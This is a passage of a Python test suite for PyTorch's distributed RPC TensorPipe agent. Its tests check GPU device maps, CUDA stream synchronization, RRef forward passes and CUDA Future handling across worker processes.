@skip_if_lt_x_gpu(1)
def test_device_map_gpu_to_cpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to="cpu",
device_map={0 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_to_cpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to="cpu",
device_map={1 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=0,
device_map={0 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=1,
device_map={1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default_to_non_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=1,
device_map={0 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default_to_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=0,
device_map={1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@staticmethod
def _gpu_add_multi_gpu(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 0]):
return x.to(0) + y, x - y.to(1)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_multi_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(1)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(x, y)
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_multi_gpu(dst)
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_multi_gpu(dst)
@staticmethod
def _gpu_add_return_to_gpu(x, y):
if x.device.type == 'cpu' and y.device.type == 'cpu':
return (x + y).to(0), (x - y).to(1), (x * y).to(2), (x / y).to(3)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_in_options(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc.TensorPipeRpcBackendOptions(
init_method=options.init_method,
num_worker_threads=options.num_worker_threads,
device_maps={dst: {0: 1, 1: 0}}
)
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(torch.zeros(2).to(0), torch.ones(2).to(1))
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
def _test_device_maps_return_to_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 2})
options.set_device_map(dst, {2: 3})
options.set_device_map(dst, {3: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_return_to_gpu,
args=(torch.zeros(2), torch.ones(2))
)
for i in range(len(rets)):
self.assertEqual(rets[i].device, torch.device((3 + i) % 4))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(3))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
self.assertEqual(rets[2], (torch.zeros(2) * torch.ones(2)).to(1))
self.assertEqual(rets[3], (torch.zeros(2) / torch.ones(2)).to(2))
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_return_to_gpu(dst)
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_return_to_gpu(dst)
@staticmethod
def _add_to_gpu(x, y):
return (x + y).to(0)
def _test_device_maps_missing_config(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = (
"TensorPipe RPC backend only supports CPU tensors by default.*"
"`set_device_map` on `TensorPipeRpcBackendOptions`"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(dst, torch.add, args=(torch.zeros(2).to(0), 1))
elif mode == RPCExecMode.REMOTE:
rpc.remote(dst, torch.add, args=(torch.zeros(2).to(0), 1)).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
def _test_device_maps_missing_config_response(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = "Response device mapping is not available"
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
elif mode == RPCExecMode.REMOTE:
rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config(self):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
def test_device_maps_missing_config_not_timeout(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options
)
timeout = rpc.get_rpc_timeout()
tik = time.time()
self._test_device_maps_missing_config(RPCExecMode.SYNC)
rpc.shutdown()
tok = time.time()
self.assertTrue(tok - tik < timeout)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote(self):
self._test_device_maps_missing_config(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(2)
def test_device_maps_remote(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
self.assertEqual(rref.to_here().device.index, 1)
self.assertEqual(rref.to_here(), torch.ones(2).to(1))
rpc.shutdown()
@staticmethod
def _slow_add_on_user_stream(x, y):
s0 = torch.cuda.current_stream(x.device)
s1 = torch.cuda.Stream(device=x.device)
s1.wait_stream(s0)
x.record_stream(s1)
y.record_stream(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
z = x + y
s0.wait_stream(s1)
z.record_stream(s0)
return z
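    # _slow_add_on_user_stream runs the add on a side stream after an artificial
    # delay (torch.cuda._sleep) and hands the result back to the caller's current
    # stream via wait_stream()/record_stream(). The custom-stream tests below rely
    # on that delay to expose any missing CUDA stream synchronization in the RPC layer.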
def _test_custom_stream(self, fn, device_map):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
fn(dst)
rpc.shutdown()
def _test_stream_sync(self, dst):
x = torch.ones(2, 2).to(0)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
self.assertEqual(ret, 2 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream(self):
self._test_custom_stream(self._test_stream_sync, {"cuda:0": "cuda:1"})
def _test_stream_multi_async(self, dst):
futs = []
for i in range(20):
x = torch.ones(2, 2).to(0) * i
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
)
for i in range(20):
self.assertEqual(futs[i].wait(), 2 * torch.ones(2, 2).to(0) * i)
@skip_if_lt_x_gpu(2)
def test_custom_stream_multi(self):
self._test_custom_stream(
self._test_stream_multi_async,
{"cuda:0": "cuda:1"}
)
@staticmethod
def _nested_slow_add_on_user_stream(dst, x, y, z):
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, y)
)
return TensorPipeAgentCudaRpcTest._slow_add_on_user_stream(ret, z)
def _test_stream_nested_sync(self, dst):
x = torch.ones(2, 2).to(0)
y = torch.ones(2, 2).to(0) * 2
z = torch.ones(2, 2).to(0) * 3
nested_dst = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
self.assertEqual(ret, 6 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested(self):
self._test_custom_stream(
self._test_stream_nested_sync,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
def _test_stream_nested_multi_async(self, dst):
if self.rank == 0:
futs = []
n = 5
xs, ys, zs = [], [], []
for i in range(n):
x = torch.ones(2, 2).to(0) * (i - 1)
y = torch.ones(2, 2).to(0) * i
z = torch.ones(2, 2).to(0) * (i + 1)
xs.append(x)
ys.append(y)
zs.append(z)
nested_dst = worker_name((self.rank + 2) % self.world_size)
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
)
for i in range(n):
self.assertEqual(futs[i].wait(), xs[i] + ys[i] + zs[i])
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested_multi(self):
self._test_custom_stream(
self._test_stream_nested_multi_async,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
@staticmethod
def _gpu_add_wrong_gpus(x, y):
if x.is_cuda and y.is_cuda:
return x.cpu() + y.cuda()
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(1)
def test_device_mismatch(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(0)
with self.assertRaisesRegex(
RuntimeError,
"Expected all tensors to be on the same device, but found at least two devices"
):
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_wrong_gpus,
args=(x, y)
)
rpc.shutdown()
def _test_rref_synchronization(self, local_device, remote_device):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device : remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
            # training of a CNN on MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
x = torch.randn(200, 1, 28, 28).to(local_device)
actual = rref.remote().forward(x).to_here()
expected = rref.rpc_sync().forward(x)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_to_here_synchronization1(self):
self._test_rref_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization2(self):
self._test_rref_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization3(self):
self._test_rref_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization4(self):
self._test_rref_synchronization("cuda:0", "cuda:1")
def _test_rref_as_arg_synchronization(
self,
local_device,
remote_device,
devicesOptions=None
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device: remote_device})
input_src = worker_name((self.rank - 1 + self.world_size) % self.world_size)
options.set_device_map(input_src, {remote_device: local_device})
if devicesOptions is not None:
options.set_devices(devicesOptions[self.rank])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
            # training of a CNN on MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_x = RRef(torch.randn(200, 1, 28, 28).to(local_device))
actual = rref.remote().forward(rref_x, True).to_here()
expected = rref.rpc_sync().forward(rref_x, True)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization1(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization2(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization3(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization4(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization5(self):
self._test_rref_as_arg_synchronization(
"cuda:0",
"cuda:0",
[["cuda:0"] for _ in range(4)], # devicesOptions
)
@staticmethod
def _rref_relay(rref):
return rref.to_here()
def _test_rref_forward_synchronization(self, local_device, remote_device):
options = self.rpc_backend_options
input_src = worker_name(0)
model_dst = worker_name(1)
out_relay = worker_name(2)
if self.rank == 0:
# for 1) model construction 2) forward execution
options.set_device_map(model_dst, {local_device: remote_device})
# Forward output will be first copied to the relay node before
# returning to the worker. This is intentional, to test RRef
# forward CUDA stream synchronizations.
options.set_device_map(out_relay, {local_device: local_device})
elif self.rank == 1:
# worker1 hosts the model and runs forward. The forward functions
# calls RRef.to_here(), hence needs to configure the device map
options.set_device_map(input_src, {remote_device: local_device})
elif self.rank == 2:
            # worker2 will get the out RRef and call to_here(), hence it needs
            # to configure the device map.
options.set_device_map(model_dst, {local_device: remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 0:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
            # training of a CNN on MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(model_dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_input = RRef(torch.randn(200, 1, 28, 28).to(local_device))
rref_out = rref.remote().forward(rref_input, True)
out = rpc.remote(
out_relay,
TensorPipeAgentCudaRpcTest._rref_relay,
args=(rref_out,)
).to_here()
expected = rref.rpc_sync().forward(rref_input, True)
self.assertEqual(out, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_forward_synchronization1(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization2(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization3(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization4(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:1")
def _test_owner_rref_forward_synchronization(self, local_device, remote_device):
if self.rank == 0:
options = self.rpc_backend_options
options.set_device_map("w0", {local_device: remote_device})
rpc.init_rpc(
"w0",
rank=0,
world_size=1,
rpc_backend_options=options
)
model = rpc.remote(
"w0", torch.nn.Linear, (2048, 20000)
).remote().to(remote_device)
for _ in range(30):
data = torch.rand(2048, 2048).to(local_device)
output = model.rpc_sync().forward(data)
# to_here() internally calls localValue as the caller is
# the owner of the RRef.
v0 = rpc.RRef(output).remote().sum().to_here().item()
v1 = output.sum().item()
self.assertEqual(v0, v1)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_owner_rref_forward_synchronization1(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization2(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization3(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization4(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:1")
@staticmethod
def _return_tensor_view(i):
x = torch.ones(1000, 200).cuda(0) * i
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
# serialization of the return value will create a new tensor from the
# view, which is done outside of the user function.
return x.split(100)[0]
@skip_if_lt_x_gpu(1)
def test_tensor_view_as_return_value(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
futs = []
for i in range(5):
futs.append(rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._return_tensor_view,
args=(i,)
))
for i in range(5):
self.assertEqual(torch.ones(100, 200) * i, futs[i].wait())
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected source devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
options.set_devices([1])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch_reverse(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected target devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
device_maps={dst: {0 : 1}},
devices=[0]
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_int(self):
fut = Future(devices=[0])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_str(self):
fut = Future(devices=["cuda:0"])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_device(self):
fut = Future(devices=[torch.device("cuda", 0)])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_not_cuda(self):
with self.assertRaisesRegex(
ValueError, "Expected devices to have indices, got cpu"
):
fut = Future(devices=["cpu"])
def _test_cuda_future_extraction(self, wrapper, unwrapper, sparse_tensor):
# We check proper CUDA stream synchronization by adding to the tensor
# in one stream to get the expected value, and reading it from another stream.
future = Future(devices=["cuda:0"])
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
another_stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
if sparse_tensor:
tensor = build_sparse_tensor().to("cuda:0")
add_tensor = build_sparse_tensor().to("cuda:0")
expected_tensor = (tensor + add_tensor).coalesce()
else:
tensor = torch.zeros((100,), device="cuda:0")
add_tensor = torch.ones((100,), device="cuda:0")
expected_tensor = tensor + add_tensor
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor += add_tensor
if sparse_tensor:
tensor = tensor.coalesce()
future.set_result(wrapper(tensor))
with torch.cuda.stream(another_stream):
tensor = unwrapper(future.wait())
if sparse_tensor:
self.assertTrue(torch.eq(tensor.indices(), expected_tensor.indices()).all().item())
self.assertTrue(torch.eq(tensor.values(), expected_tensor.values()).all().item())
self.assertEqual(tensor.size(), expected_tensor.size())
else:
self.assertTrue(torch.eq(tensor, expected_tensor).all().item())
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=True
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=True
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=True
)
@skip_if_lt_x_gpu(2)
def test_cuda_future_callback_changes_devices(self):
# We check proper CUDA stream synchronization by filling the tensor with
# the expected value in one stream, and reading it from another stream.
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:0", "cuda:1"])
def cb(fut):
t0 = fut.value()
tensor1.copy_(t0, non_blocking=True)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(2)
def test_cuda_future_value_on_bad_device(self):
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:1"])
# As a plus, we test that futures still invoke callbacks even in case of
# error, and that the child futures are successful if those callbacks
# don't access the parent future.
def cb(fut):
with torch.cuda.device("cuda:1"):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor1.fill_(1)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with self.assertRaisesRegex(
ValueError,
r"The result contained tensors residing on device\(s\) cuda:0 "
r"which are not among the expected device\(s\) cuda:1",
):
parent_future.wait()
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(1)
def test_async_execution_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
t = torch.zeros((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_sleep_and_set_to_one, args=(t,))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 1).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_async_execution_nested_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
nested_dst = worker_name((self.rank + 2) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
a = torch.ones((100,), device="cuda:0")
b = torch.ones((100,), device="cuda:0")
c = torch.ones((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_nested_add, args=(nested_dst, a, b, c))
